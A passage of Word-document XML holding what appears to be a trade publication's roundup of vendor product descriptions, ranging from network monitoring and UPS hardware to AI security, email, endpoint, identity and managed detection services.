          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>enhanced throughout 2025, Smart Alert Suppression brings added clarity to network outages, eliminating redundant alerts related to downstream devices and giving technicians more relevant topology insights than ever before.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March 2026, Auvik further expanded ANM with High Availability (HA) Pair Monitoring for active/passive firewall pairs, ensuring complete visibility and data continuity across both devices. A dedicated HA Pair widget provides at-a-glance insights into each firewall's health, sync state, and role.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SOLiD BARS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SOLiD BARS is an innovative distributed antenna system (DAS) solution for faster deployments of in-building connectivity, reducing the cost and complexity of delivering 4G and 5G coverage that works with all three major U.S. carriers: AT&amp;T, T-Mobile and Verizon. The solution addresses a critical need for seamless communications in small to mid-sized 'Middleprise' buildings, including offices, hospitals, schools, retail, and commercial venues.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SOLiD BARS solution utilizes "off-air" signals from the nearest cellular tower or a direct connection to small cells to deliver scalable, enterprise-grade coverage immediately upon installation, eliminating the cost and delays associated with waiting for carrier-provided signal sources. With an adaptive Interference Cancellation System and backed by a strong reputation for quality, the multi-operator BARS solution delivers optimal cellular coverage for the best balance of performance, scalability, and cost-effectiveness, making it the premier choice for the Middleprise.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SOLiD BARS DAS solution is available exclusively through authorized distributors.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Zyxel Networks XMG2230 Series 28/52-Port GbE 2.5G L3 Access Switch With 4 10G Uplink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Zyxel XMG2230 Series is a next-generation Layer 3 multi-gig access switch purpose-built to unlock the full potential of Wi-Fi 7 networks.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Available in 28- and 52-port models, it combines 2.5G multi-gig access, high-power PoE++ (up to 60W per port and budgets up to 2400W with DC Power), and 10G fiber uplinks to deliver enterprise-grade performance without enterprise complexity. Designed for SMB and midmarket organizations, the XMG2230 Series powers bandwidth-intensive environments from Wi-Fi 7 deployments and IP surveillance to AV-over-IP and IoT ecosystems.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NebulaFlex Pro, organizations can seamlessly switch between standalone and cloud management, enabling unmatched deployment flexibility and scalability. Built for always-on performance, dual AC/DC power redundancy ensures business continuity in mission-critical environments.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result is a high-performance, future-ready switching platform that removes cost and complexity barriers to next-gen network adoption.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Power Protection And Management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CyberPower PowerPanel Cloud Pro</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PowerPanel Cloud Pro makes it easy to monitor an unlimited number of CyberPower UPS systems anywhere there is an internet connection. Now businesses can simplify power monitoring options to gain efficiency and reduce IT resources.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dashboard provides at-a-glance UPS status, power conditions, and instant problem recognition. Cloud card installation enables simple remote monitoring from anywhere. Event logs provide key insights for trouble shooting and prevention of potential power issues. Alert notifications are sent via email or through the mobile app.</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It's ideal for decentralized IT service providers, POS systems with limited network infrastructure, and small/medium businesses looking to simplify power monitoring. Billing is made simple and flexible by allowing users to purchase exactly the number of nodes they need each month. Accounts can be accessed through the web-based app or mobile app that is downloaded through either the Apple App Store or Google Play Store.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Eaton 9PX G2 Uninterruptible Power Supply (UPS)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Eaton 9PX G2 UPS is a next-generation online double conversion UPS delivering high-efficiency, high-density power protection for distributed IT, edge computing, and mission-critical environments.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Built on Eaton's proven 9PX platform, the 9PX G2 provides more usable power in less rack space, enhanced battery management, and certified cybersecurity to support modern IT infrastructures. Available in 3-11 kVA models with rack or tower configurations, the 9PX G2 supports network closets, server rooms, data centers, and AI-at-the-edge deployments. Features include true online double conversion technology, hot-swappable batteries, internal bypass, and optional maintenance bypass to help prevent downtime. Each unit includes a Gigabit network card with market-leading cybersecurity, enabling secure remote monitoring, management, and firmware updates through Eaton software solutions.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Designed for easy deployment and long-term reliability, the 9PX G2 maximizes uptime while reducing operating costs and total cost of ownership.</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Security-AI Security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Cato AI Security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Cato AI Security is built to secure and govern every AI interaction (from shadow AI to AI applications and AI agents). On March 17, Cato Networks announced Cato AI Security, which unifies AI governance and runtime protection across major AI use cases-governing employee use of AI tools, securing homegrown AI applications, and enforcing guardrails for autonomous AI agents.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Cato AI Security operates as a standalone solution or alongside additional Cato SASE Platform capabilities, enabling enterprises to immediately secure AI transformation while providing a seamless path forward to broader network and security initiatives, such as SD-WAN, SSE, or Universal ZTNA (UZTNA). All capabilities are managed through a unified control plane and policy engine, sharing context to deliver faster, more precise detection and response.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Cyera AI Security Platform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Cyera's AI Security Platform secures sensitive data in cloud and AI-driven environments, where traditional controls often fail. As AI operates at machine speed, Cyera provides continuous, real-time visibility into data location, access permissions, and usage across both human and automated systems.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Over the past year, Cyera has launched a suite of new capabilities including AI Guardian, Browser Shield, Data Lineage, and Cyera MCP to close critical security gaps. These updates automatically map AI assets, proactively identify risks, and enforce real-time guardrails to prevent data leakage.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providing deeper visibility and automated protection, Cyera ensures enterprises can embrace the AI era while keeping their proprietary assets protected without compromising operational velocity.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Exabeam Agent Behavior Analytics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Exabeam Agent Behavior Analytics (ABA) is the first security capability designed to monitor and detect the behavior of AI agents operating inside the enterprise. As organizations adopt tools like ChatGPT, Microsoft Copilot, and Google Gemini, traditional security controls lose visibility once valid access is granted.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Unlike traditional threat detection, which relies on static rules and known indicators, Exabeam ABA builds dynamic behavioral baselines and profiles for both human users and AI agents. It then detects deviations across prompts, API activity, tool usage, data access, and privilege changes. This enables security teams to identify misuse, compromised accounts, prompt abuse, and insider threats operating with legitimate credentials. The April 2026 update expands visibility across leading AI platforms and adds coverage aligned to the OWASP Top 10 for Agentic AI.</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Designed for enterprise SOC teams, MSSPs, and organizations rapidly adopting AI, Exabeam ABA enables secure, governed AI adoption without sacrificing visibility or control.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Netskope One AI Security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Rapid AI adoption has created significant security gaps for enterprises, namely that legacy security products lack visibility into the ways their data is being used across AI-based applications, private and public AI models, and AI agents and tools, with AI systems often bypassing security and introducing risks including data exfiltration, manipulative prompts, and inappropriate usage.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Netskope One AI Security provides comprehensive discovery, visibility and real-time control of AI applications, models, agents and tools in use, analyzes their specific risks, and enables teams to accelerate AI adoption and innovation across the entire ecosystem without compromising security or control.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Netskope One AI Security suite features four new products to power and enable the AI era, all unified within the Netskope One platform. The new products include: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-Netskope One Agentic Broker: Providing visibility and control over all MCP transactions - sanctioned or unsanctioned - enabling organizations to secure agentic AI interactions.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-Netskope One AI Guardrails: Preventing AI-specific threats, including prompt injection and jailbreaking, and providing LLM content moderation to enable responsible AI use.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-Netskope One AI Gateway: Inspecting and enforcing security policies for private AI apps/LLMs that organizations host or build themselves.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-Netskope One AI Red Teaming: Simulate adversarial attacks, uncover weaknesses, and assess safety risks of LLMs/AI applications.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Through Netskope One AI Security, customers can access the Netskope Cloud Confidence Index (CCI) which covers over 1,800+ GenAI apps and 85,000+ SaaS applications, helping organizations proactively understand AI-related risks, including data usage, third-party sharing, and model training behaviors.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Palo Alto Networks Prisma AIRS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Prisma AIRS is the world's most comprehensive AI security platform. Seamlessly connecting deep AI apps, agent and model inspection in development with real-time defense at production runtime, Prisma AIRS continuously validates the security of AI apps and agents with autonomous AI Red Teaming, securing all interactions between AI models, agents, data, and users. It empowers enterprises to deploy AI bravely knowing that their applications are secure by design.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platform delivers three core value propositions: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-Discovery of the entire AI ecosystem - including apps, models, agents, and data sources,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-Automated assessment of AI risks for applications and agents,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-Protection of all AI apps and agent deployments with inline threat detection and security controls.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Zscaler AI Protect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Zscaler AI Protect secures the full AI lifecycle-from experimentation to production-so enterprises can innovate with confidence. It delivers (1) AI asset management with continuous discovery, ownership mapping, and risk classification across AI apps, models, agents, and MCP servers; (2) secure access to AI with identity-aware controls and in-line inspection for prompt visibility, adversarial attack prevention, and protection of prompts and responses across SaaS and developer environments; and (3) built-in AI SDLC security via continuous red-teaming, prompt hardening, model risk benchmarking, and runtime guardrails that block jailbreaks, prompt injection, data leakage, and policy violations in production.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Target market: medium-to-large enterprises accelerating AI adoption- especially regulated industries (financial services, healthcare, public sector)-and security, IT, and platform/ML engineering teams responsible for AI governance, data protection, and safe delivery.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Security-Cloud And Application Security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Armis Centrix For Application Security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Armis Centrix for Application Security consolidates detection, contextualization and remediation across the software development lifecycle. It provides comprehensive coverage, including static application security testing (SAST), software composition analysis (SCA), infrastructure as code (IaC), secrets, open-source licenses, and software bill of materials (SBOM), all from a single interface. The solution enables organizations to secure their entire software supply chain without juggling multiple point solutions.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Built for enterprise scalability, Armis Centrix for Application Security targets CISOs, heads of application security, DevSecOps leads and engineering managers who need to manage cyber risk exposure across complex, distributed environments.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CrowdStrike Falcon Shield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SaaS is the new battleground. Adversaries are breaching applications, identities, and data across the SaaS stack - often without malware and at machine speed. CrowdStrike Falcon Shield secures the SaaS applications organizations rely on to run their business, from collaboration and CRM to AI-driven workflows. It gives security teams visibility into misconfigurations, excessive permissions, and risky behavior across 200+ applications.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Falcon Shield protects both human and non-human identities - including service accounts, API keys, and AI agents - and protects SaaS applications at runtime to stop credential abuse, account takeover, and malicious automation. With prioritization of the most critical SaaS risks and automated remediation, teams can reduce risk and respond faster without adding complexity.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Palo Alto Networks Cortex Cloud 2.0</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Cortex Cloud 2.0 is the industry's first Agentic CNAPP designed to scale defense across complex multi-cloud environments. By seamlessly merging Cloud-Native Application Protection (CNAPP) with Cloud Detection and Response (CDR), it protects the entire lifecycle from code development to runtime. The platform unifies code, cloud, and SOC telemetry into a single, unbroken workflow, eliminating the silos and communication gaps that traditionally stall critical security actions. Its native autonomous AI agents investigate and act within enterprise guardrails, delivering real- time protection from the workload to the network edge.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Targeted at Global 2000 enterprises and high-velocity DevSecOps teams, Cortex Cloud 2.0 allows organizations to do more than just see risk-it enables them to eliminate it autonomously. This transition from manual triage to agentic resolution significantly cuts Mean Time to Remediation (MTTR), ensuring security keeps pace with AI-driven development.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Terra Security Terra Platform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Terra Platform is an agentic AI-powered penetration testing platform designed to deliver continuous, real-world exposure validation as applications evolve. Purpose-built for modern development environments, it replaces point-in-time testing with continuous security validation in production. At its core, Terra Platform uses AI agents to map attack surfaces, monitor code and configuration changes, and validate vulnerabilities that are reachable and exploitable in real-world conditions.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latest update to Terra Platform is Terra Portal, which enables human-in- the-loop oversight by allowing security teams and partners to supervise and guide AI-driven testing. This hybrid model ensures safety, accuracy, and compliance readiness while accelerating remediation and eliminating false positives. Terra Platform is designed for security teams and service providers looking to continuously reduce real risk, not just identify theoretical issues.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ThreatLocker Zero Trust Cloud Access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Zero Trust Cloud Access with ThreatLocker is a modern approach to securing third-party SaaS. Zero Trust Cloud Access shifts access verification to the device level, allowing administrators to define exactly who can access what, based on user identity, device, and context. ThreatLocker ensures that devices are validated through a secure broker before connecting to platforms such as Salesforce, Microsoft 365, Asana, Google Workspace, and GitHub. Even if a user is successfully phished, attackers cannot access resources unless they have possession of the user's trusted device.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Like all ThreatLocker solutions, Zero Trust Cloud Access is built for rapid deployment and effortless scalability. An intuitive dashboard enables channel partners to create policies in minutes, an important advantage when managing high client volumes.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Zero Trust Cloud Access is designed for any organization looking to protect its SaaS environments, whether for internal use or across client ecosystems.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Zscaler Zero Trust Cloud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Zscaler Zero Trust Cloud is a cloud-native workload security solution that centralizes how customers secure and manage traffic across multi-cloud and hybrid environments.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applies a consistent Zero Trust framework to protect all workload traffic paths-including ingress, egress, and east-west flows-without relying on traditional firewall-centric architectures. With inline inspection (including cloud-scale TLS inspection), unified policy enforcement, and microsegmentation, it helps reduce attack surface, prevent lateral movement, and simplify day-to-day operations.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Zero Trust Cloud is designed for enterprise organizations operating modern application environments across AWS, Azure, GCP, and private data centers that need scalable security, consistent controls, and reduced operational complexity.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Security-Data Security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Concentric AI Semantic DLP</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Concentric AI Semantic DLP enables organizations to safely adopt GenAI without increasing their data risk. It does this by uniquely monitoring and preventing the leakage of sensitive data to public GenAI applications. It sits in every user's browser, intercepting data as it is entered into GenAI applications. It provides full visibility into every public AI tool in use, including shadow AI, as well as visibility into how employees interact with these tools. It applies precise, context-aware guardrails that prevent sensitive data from being shared in AI prompts and uploads. It continuously monitors activity, automatically protects newly created content, and logs every prompt, response, and policy violation in detail.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result is fewer blind spots, smarter enforcement, faster investigations, and AI governance teams can trust-without slowing productivity or innovation. It targets organizations across all verticals. Semantic DLP targets SMBs, SMEs, mid-market, and large enterprises.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Cribl Guard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Cribl Guard is an AI-powered sensitive data protection capability built into Cribl Stream. It continuously scans telemetry-logs, metrics, and traces-in real time to automatically detect PII, secrets, and other regulated data as it flows through existing pipelines, before it lands in downstream tools or storage. Using curated and custom rulesets plus background detection models, Guard can mask, encrypt, redact, or block sensitive fields and route high-risk events to safer destinations. A human- in-the-loop control layer lets teams review findings, tune policies, and convert detections into enforceable rules with a click.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target market is security, compliance, and observability teams in regulated or data-sensitive industries-such as financial services, healthcare, government, and large enterprises-who need proactive, auditable protection for sensitive data across hybrid and multi-cloud environments.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CrowdStrike Falcon Data Security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CrowdStrike Falcon Data Security is a new data security solution that stops data theft across the agentic enterprise. Powered by real-world adversary intelligence and unified Falcon platform context, Falcon Data Security discovers, classifies, and stops data theft in real time, whether caused by an employee mistake, a malicious insider, or an adversary operating with valid credentials.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Key features include AI-powered classification that identifies and tracks sensitive data in motion across endpoints, SaaS, cloud, browsers, and AI workflows. GenAI data protection prevents exposure across managed and unmanaged tools, while real-time cloud visibility surfaces cloud data risk. Unified platform context evaluates data threats alongside endpoint, identity, and cloud activity, giving teams user, device, and access context in a single console to correlate, prioritize, and stop threats faster. Automated enforcement blocks risky data movement at endpoint egress, prevents unauthorized access in SaaS applications, and automates cloud data response actions through unified SOAR workflows.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Drata Agentic TPRM Assessment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Agentic TPRM Assessment brings AI-assisted analysis directly into third- party risk management workflows while keeping security teams fully in control of the review process. Instead of relying solely on questionnaires or vendor self-attestations, Drata analyzes real vendor security documentation and evaluates that evidence against structured assessment criteria defined by the organization. Security teams review the findings, validate the analysis, and make the final risk decision.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approach helps organizations complete vendor assessments faster while maintaining oversight and accountability. The result is higher-quality analysis and more defensible risk decisions. By working closely with its customers as enterprise design partners, Drata was able to build the TPRM Agent with direct input from organizations managing complex, large-scale vendor risk programs - ensuring real-world pain points like scalability, workflow fragmentation, and audit readiness were addressed from day one.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NetApp Ransomware Resilience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NetApp Ransomware Resilience delivers a comprehensive solution for ransomware defense for ONTAP, enabling organizations to minimize the impact, recover their data and return to normal business operations quickly and easily following an attack.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Protecting data where it resides, Ransomware Resilience automatically detects data breaches, suspicious user behavior, encryption and data deletion in real time, and immediately responds to contain the attack and limit its impact. Ransomware Resilience then cleans and restores the maximum amount of up-to-date data possible, all through a guided process. With Ransomware Resilience you can limit data loss, prevent reinfection of the data, and minimize business disruptions while reducing the operational burden of managing cyber defense for ONTAP.</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Ransomware Resilience gives you peace of mind. If an attack occurs on your storage, you'll know immediately, your valuable data will be protected, and recovery will be quick and easy.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Sentra AI Data Readiness For Google Workspace Gemini And Microsoft Copilot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Sentra's AI Data Readiness solution helps organizations securely adopt AI assistants such as Google Gemini and Microsoft Copilot by providing visibility into what sensitive data exists, where it resides and which identities can access it.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The platform continuously discovers and classifies sensitive data across collaboration platforms including Google Workspace, then maps that data to users, groups and AI agents. It identifies overexposed data, stale permissions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and labeling gaps that can increase risk when AI assistants are enabled. By applying classification and automated labeling, Sentra enables existing controls such as Google Workspace DLP and Microsoft Purview to enforce policies based on actual data exposure. This allows organizations to reduce risk before AI rollout and maintain control as data and access change over time.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solution is designed for midmarket and enterprise organizations adopting AI across cloud and SaaS environments.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Security-Email And Web Security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Abnormal AI Phishing Coach</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AI Phishing Coach is an AI-native security awareness training (SAT) platform designed to reduce human-driven cybersecurity risk. Instead of using generic templates or manually curated content, it uses behavioral AI to analyze real phishing attacks and tailor simulations to each employee's role, communication patterns, and historical risk. When users engage with simulated messages, the platform delivers immediate, AI-powered coaching that explains what was missed and how to improve.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Since October 16, Abnormal has rolled out major new feature releases including: credential phishing simulations that detect true credential exposure risk, business and vendor email compromise simulations that mimic real-world fraud scenarios, multi-language video training for global accessibility, and executive dashboard and continuous phishing risk scoring to provide ongoing visibility into human risk and program effectiveness.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AI Phishing Coach is built for security leaders seeking a scalable, automated way to improve security awareness and defend against increasingly sophisticated social engineering attacks.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Barracuda Email Protection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Barracuda Email Protection delivers powerful, integrated email security that is easy to buy, deploy, and use. It protects resource-constrained organizations across healthcare, finance, education, government, manufacturing, and more. These organizations face escalating threats including ransomware, business email compromise, account takeover, and increasingly sophisticated AI-generated phishing attacks designed to evade traditional defenses.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solution delivers comprehensive, multilayered protection that enhances the traditional gateway with AI, context-aware behavioral analysis, and sandboxing that uses multimodal AI, also adding an API-based inbox level for context-aware analysis, account takeover protection and post-delivery remediation. These enterprise-grade capabilities are delivered through a unified platform, reducing the need for multiple tools or complex add-ons.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making robust, scalable email security accessible to organizations of all sizes and industries, Barracuda Email Protection directly addresses one of the most urgent and pervasive risks facing organizations.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Mimecast Email Security, API-Based Protection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Mimecast Email Security, API-Based Protection, is an enterprise email security solution that delivers full secure email gateway-grade protection through direct Microsoft 365 API integration, enabling organizations to implement enterprise-level threat detection and remediation without MX record changes or mail flow modifications.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solution activates across an organization's entire M365 environment in minutes, scanning messages post-delivery using the same detection engines that power Mimecast's gateway deployment. Protection includes multi-vector threat detection, deep URL inspection, malware sandboxing, advanced AI- powered BEC detection, and account takeover protection. Every threat signal feeds into Mimecast's Human Risk Command Center, correlating email threats with user behavior, identity signals, and insider risk indicators.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API-Based Protection is a fit for organizations of all sizes, but specifically targets mid-market and enterprise organizations that are resistant to MX record changes, operating with lean IT teams, or currently relying on Microsoft controls or lightweight ICES point solutions that leave critical detection gaps.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Proofpoint 365 Total Protection Plan 4-AI Cyber Assistant (AI.MY)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AI Cyber Assistant (AI.MY), from Hornetsecurity (now Proofpoint's MSP Platform business unit), is an AI-powered security layer within Plan 4 of the 365 Total Protection platform for Microsoft 365.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Purpose-built for managed service providers (MSPs), it enhances threat detection and response across Microsoft 365 through three core capabilities: AI Email Security Analyst, Teams Protection, and AI Recipient Validation. These components help identify suspicious emails, detect threats within Microsoft Teams, including compromised accounts, and prevent misdirected or risky email communication. It is fully integrated into the 365 Total Protection multi-tenant, all-in-one platform that provides security, backup, security awareness training and GRC functionality.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AI.MY enables MSPs to manage security across customers from a single interface while automating analysis and response workflows. The solution is designed for MSPs and IT teams supporting small and mid-sized businesses, delivering advanced, scalable protection within a unified platform that combines security, backup, compliance, and awareness.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Sublime Email Security Platform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Sublime Security is an AI-powered email security platform that replaces legacy, one-size-fits-all defenses with a multi-agent model that tailors security coverage to each organization's unique risk profile.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At its core are two industry-first autonomous AI agents: the Autonomous Security Analyst (ASA), which automates end-to-end triage and response to suspicious and user-reported emails, and the Autonomous Detection Engineer (AD'E), which continuously generates and adapts custom detection coverage for each customer environment. Together, they form the industry's first multi-agent AI system for email security. Sublime serves organizations of all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sizes, from individual users on its free tier to Fortune 500 enterprises, with customers including Spotify, Snowflake, Elastic, Zscaler, Anduril, and SentinelOne.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ThreatDown Email Security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ThreatDown Email Security provides enterprise-grade protection for SMBs and security service providers with lean IT teams, delivering an adaptive defense against increasingly sophisticated attacks.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solution combines machine learning, natural language processing, and behavioral analysis to identify and block advanced phishing, business email compromise (BEC), and credential harvesting, with high accuracy.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Designed for organizations with limited resources, the module addresses a critical security gap: Small businesses often operate with less than two security staff yet face a rising average breach cost of over $4 million. The solution crowdsources threat intelligence from over 16,000 security teams, providing intelligent, self-learning protection that continuously learns and adjusts to new threats and attacks. This automated approach enables lean teams to proactively detect and remediate threats without manual intervention.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ThreatDown Email Security allows organizations to stay ahead of evolving email threats, while significantly reducing operational complexity and the risk of devastating breaches.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Security-Endpoint Protection/Extended Detection And Response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Action1 Platform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Action1 Platform is a cloud-native autonomous endpoint management (AEM) solution that unifies patch management, vulnerability assessment, and software deployment across Windows, macOS, and Linux - all from a single console, without requiring a VPN. It automates OS and third-party patching at scale, delivers real-time vulnerability visibility across hybrid environments, and supports compliance with PCI DSS, HIPAA, SOC 2, and CIS frameworks.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Configurable in minutes, Action1 is trusted by Fortune 500 companies across healthcare, finance, manufacturing, and other industries. Action1 has also been ranked as the fastest-growing software company in America according to Inc.</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Target markets include enterprise IT teams managing complex, distributed environments, as well as MSSPs supporting multiple clients. Channel partners also leverage Action1 to serve mid-market and enterprise customers. Organizations use the Action1 Platform to reduce patching costs, eliminate manual remediation efforts, and maintain continuous endpoint security - regardless of operating system or network location.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Arctic Wolf Aurora Endpoint Security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Aurora Endpoint Security is Arctic Wolf's next-generation endpoint security portfolio, powered by Aurora AI and built on the Aurora Superintelligence Platform. It delivers advanced threat protection, detection, and response directly at the endpoint through a cloud-native portfolio that includes our endpoint protection platform, endpoint detection and response, ransomware resilience, and mobile threat defense with flexible managed service options.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leveraging insights from over 10,000 customers and 10 trillion security observations a week on average, Aurora Endpoint Security enables proactive threat prevention, rapid detection, and consistent response at scale. It is designed for organizations of all sizes seeking enterprise-grade protection. With battle-proven, AI-powered endpoint security that boasts a 99-percent true positive rate, protection against zero-day threats, a 90- percent reduction in alert fatigue, and 30 percent faster incident investigations, on average, customers achieve more than 13x ROI, eliminate thousands of hours of manual effort, and reduce operational burden through AI-driven automation and efficiency.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HENNGE Endpoint &amp; Managed Security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HENNGE Endpoint &amp; Managed Security is a cloud-native, unified security stack providing EPP, EDR, and MDR capabilities through a unified easy-to- use platform. It focuses on proactive breach prevention by combining automated patch management for 2,500+ applications with AI-powered zero-day detection and ransomware defense.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product's core functionality ranges from automated containment and behavioral analysis to 24/7 expert-led monitoring and remediation. It effectively eliminates "blind spots" and alert noise by correlating telemetry into meaningful incidents, backed by a global "follow-the-sun" team of analysts for immediate threat eradication.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Target markets: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-MSPs with lean IT teams: MSPs looking to reduce management overhead and alert fatigue.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MSPs with compliance-focused clients: For managing clients who are requiring 24/7 oversight and documented forensic trails for audits.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MSPs with global clients: For managing clients who need continuous, expert-level protection across multiple time zones without maintaining an in-house SOC.</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WatchGuard Endpoint Security Prime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Endpoint Security Prime is WatchGuard's newest endpoint protection offering, delivering AI-powered EDR with built-in controls to reduce the attack surface in a single, lightweight solution. It provides clear incident visibility and stops both known and advanced threats, including ransomware, fileless attacks, and living-off-the-land techniques.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Managed through WatchGuard Cloud, Endpoint Security Prime simplifies deployment and operations with one agent and an intuitive, multi-tenant console. Built-in capabilities such as vulnerability management, device control, web filtering, anti-phishing, and protection against internet- exposed service vulnerabilities proactively reduce risk by limiting entry points.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This product is designed for small and midsize businesses and the partners who support them, delivering enterprise-grade endpoint protection without the cost or complexity typically associated with leading EDR solutions.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Security-Identity And Access Management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1Password Unified Access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organizations aren't prepared for what happens after AI agents log in. Unlike human access, which is authenticated once, agents use credentials continuously, operating across devices, tools, and workflows that often sit outside the visibility of traditional identity systems. The result is a growing gap between where access is granted and where it's actually used.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1Password Unified Access is a new agent security platform, providing a centralized control plane to govern access across human, AI agent, and machine identities, enforcing security at the point of use, not just at login. Built on a "discover, secure, audit" model, it enables teams to uncover agent activity, secure and govern credentials in a unified vault, and gain visibility into how access is used over time. Designed for businesses of all sizes, Unified Access integrates into developer tools and workflows, creating new opportunities for partners to deliver modern identity security as customers adopt AI.</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CrowdStrike Falcon Next-Gen Identity Security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CrowdStrike Falcon Next-Gen Identity Security protects every identity - human, non-human, and AI agent - across hybrid environments. It unifies initial access prevention, phishing-resistant MFA, privileged access management, identity threat detection and response, SaaS identity security, and agentic identity protection in a single unified platform.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 AI agents transform how work gets done, operating with superhuman speed and access, Falcon Identity Security accelerates the shift from fragmented, static access controls to continuous, risk-aware authorization. Powered by real-time Falcon platform intelligence and risk signals, CrowdStrike continuously evaluates identity, device, and behavior to dynamically grant, deny, or revoke access as conditions change, eliminating standing privilege access across every identity and environment.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CrowdStrike's ability to secure both human and agentic identities wherever they exist is rapidly turning Falcon Next-Gen Identity Security into the identity security control plane of the agentic enterprise.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Delinea Platform With Iris AI</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AI agents are being deployed across enterprise environments faster than security teams can track them, creating a new class of privileged identity with no consistent oversight. Delinea Iris AI is the AI engine built into the Delinea Platform that gives security teams the visibility and control to address this directly.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transforms privileged session auditing from a manual, time-intensive process into an AI-driven workflow that automatically summarizes sessions, surfaces high-risk commands, and highlights anomalous behavior so teams can focus investigation where it matters most. Iris AI also extends AI-powered analysis to access authorization, supporting more informed, risk-aware access decisions.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Purpose-built for enterprise IT and security teams, Iris AI helps organizations reduce identity risk, accelerate investigation, improve audit readiness, and demonstrate compliance across cloud, on-premises, and hybrid environments.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JumpCloud AI &amp; SaaS Management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 introduce the ability to detect AI usage across browsers and managed devices, including GenAI, agentic browsers, and coding assistants, via multi-layer discovery. This allows our partners to track their clients AI lifecycle, usage, adoption, and departmental activity from a unified Shadow AI dashboard.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is a significant enhancement to our SaaS management feature because we can now track and discover across 400 dedicated AI applications. What's more, this data is now also available via our new AI Admin bot, giving our partners the ability to easily search and understand their clients AI usage.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Orchid Security Identity-First Security Orchestration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Orchid Security provides the industry's first Identity Control Plane; an independent layer between enterprise applications (on-premise, co-located, cloud-hosted or SaaS) and your IAM tooling (IdP, PAM, IGA, etc.). The solution continuously discovers enterprise applications, analyzes native authentication and authorization flows, surfaces identity utilization and accelerates onboarding into governance systems.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exposing and remediating Identity Dark Matter across modern environments, Orchid helps enterprises reduce risk (83 percent out of the box), lower operational costs (by 75 percent+), speed the business (reducing effort by 90 percent+) and achieve compliance at scale.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Orchid serves global enterprises across financial services, healthcare, and critical infrastructure. Enterprises now have comprehensive visibility, insight and control across human, non-human, and agent-AI identities, closing the gap between identity intent and identity execution.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Silverfort Identity Security Platform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Silverfort's Identity Security Platform is a unified solution designed for enterprises operating across hybrid cloud and on-prem environments. It addresses one of today's most critical cybersecurity challenges: fragmented identity controls that leave service accounts, legacy systems, and IT/OT infrastructure exposed.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As attackers increasingly rely on stolen credentials to bypass traditional defenses, Silverfort protects all identity types (human, machine, NHI, and AI) by enforcing security controls in real-time at the point of access. Its patented Runtime Access Protection technology analyzes every authentication attempt in-line, applying adaptive policies such as MFA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and access restrictions to stop threats like credential abuse, lateral movement, and ransomware before they spread. Deployed in days, the platform integrates seamlessly with existing IAM systems to extend protection to previously unprotected assets.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unifying visibility and enforcement across the entire identity ecosystem, Silverfort enables enterprises to consistently secure identities at scale, without disrupting operations.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Security-Managed Detection And Response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Arctic Wolf Managed Detection And Response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 one of the core modules operating on the Aurora Superintelligence Platform, Arctic Wolf Managed Detection and Response is supercharged by the Aurora Agentic SOC and reduces the frequency and severity of attacks with measurable outcomes, not just alerts, helping organizations tackle challenges of the global cybersecurity talent shortage and escalating threat environment, by providing broad visibility, 24x7 monitoring, and advanced threat detection-all delivered as an outsourced and fully managed solution.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Arctic Wolf MDR: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-Optimizes existing security tools for better prevention and then leveraging the Aurora Platform for storage, enrichment, and analysis of their data,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-Adds external expertise to establish broad 24x7 monitoring that can quickly identify and respond to advanced threats,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-Continually reviews cybersecurity posture and recommending strategic actions that will harden their environment.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CrowdStrike Falcon Complete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CrowdStrike Falcon Complete delivers managed, 24/7 detection, investigation, and response to help organizations overcome the widening cybersecurity skills gap and stop breaches. Falcon Complete combines elite cyber expertise with CrowdStrike's AI-native Falcon platform to secure endpoints, identities, cloud environments, and third-party data.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 adversaries weaponize AI to scale and accelerate attacks, Agentic MDR delivers the next evolution of managed detection and response. Falcon Complete's elite analysts build and deploy intelligent agents to automate high-friction security workflows and stop breaches at machine speed, creating a closed-loop system that gets smarter with every engagement.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Cynet CyAI</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Cynet's proprietary AI engine powers the Cynet AI Security Operations Center (AI SOC), combining autonomous threat detection with expert human validation. Built into Cynet's unified cybersecurity platform, CyAI analyzes signals across endpoints, identities, users, networks, cloud environments, email, SaaS, and mobile to identify 97 percent of threats before they execute and remediate 90 percent automatically.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engine correlates telemetry across the environment, prioritizes alerts with contextual playbooks, and automatically stops threats in under a second. CyAI works alongside Cynet's 24x7 CyOps team of security experts who validate alerts, apply business context, and guide remediation.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platform is delivered through a global network of MSPs and resellers that need to provide enterprise-grade protection for thousands of small and mid-market businesses without building a full internal SOC. It enables partners to deliver advanced detection and response capabilities while simplifying operations and improving security outcomes for customers.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Expel Managed SIEM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Expel Managed SIEM is a co-managed service that brings Expel's detection engineering expertise directly into customers' existing Microsoft Sentinel and Splunk Enterprise Security environments. It handles the ongoing operational burden that keeps most security teams from getting real value out of their SIEM: writing and tuning detection rules, monitoring data pipelines for gaps, reducing false positives, and continuously improving coverage as environments change.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service is available in two tiers: Detection Engineering covers rule development, logic tuning, and pipeline monitoring as a continuous subscription. Performance Engineering adds active SIEM health remediation, cost optimization, SOAR playbook design, and ingestion management for teams that want a deeper operational partnership. Every detection rule Expel writes belongs to the customer, with no proprietary formats and no lock-in.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service is available as an add-on to Expel MDR and targets midmarket and enterprise security teams running Sentinel or Splunk.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Security-Network Security-Enterprise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Armis Centrix For Vulnerability Management Detection And Response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Armis Centrix for Vulnerability Management Detection and Response is the most advanced intelligent detection solution on the market, offering complete control over how and when to discover, identify and validate vulnerabilities.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Unlike traditional scanners that provide static snapshots, the solution offers comprehensive, continuous awareness across all vulnerabilities and asset types, including IT, IoT, cloud and network devices. Its core functionality centers on a unified, intelligence-driven approach that analyzes an organization's existing environment before conducting a scan, then leverages targeted queries to supplement any additional information. Armis Centrix 